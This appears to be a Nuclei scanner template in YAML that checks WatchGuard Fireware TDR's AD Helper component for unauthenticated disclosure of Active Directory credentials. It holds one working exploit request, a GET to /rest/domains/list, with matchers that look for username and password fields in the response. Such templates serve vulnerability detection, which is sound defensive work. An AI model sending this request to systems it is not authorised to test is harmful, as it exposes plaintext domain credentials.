38 lines
1.3 KiB
YAML
38 lines
1.3 KiB
YAML
id: watchguard-credentials-disclosure
|
|
|
|
info:
|
|
name: WatchGuard Fireware AD Helper Component - Credentials Disclosure
|
|
author: gy741
|
|
severity: critical
|
|
description: WatchGuard Fireware Threat Detection and Response (TDR) service contains a credential-disclosure vulnerability in the AD Helper component that allows unauthenticated attackers to gain Active Directory credentials for a Windows domain in plaintext.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/48203
|
|
- https://www.watchguard.com/wgrd-blog/tdr-ad-helper-credential-disclosure-vulnerability
|
|
classification:
|
|
cvss-metrics: CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cwe-id: CWE-288
|
|
metadata:
|
|
max-request: 1
|
|
tags: watchguard,disclosure,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"fullyQualifiedName"'
|
|
- '"logonDomain"'
|
|
- '"username"'
|
|
- '"password"'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100cb1826afa25b9c8389639821a8d70a46d969558cef9b7d1d60e9dd9b2766acf1022044500e71b2f264d8cc6f11b39c22d2e3ec6b48254564e6b3e6e576a18cb72278:922c64590222798bb761d5b6d8e72950 |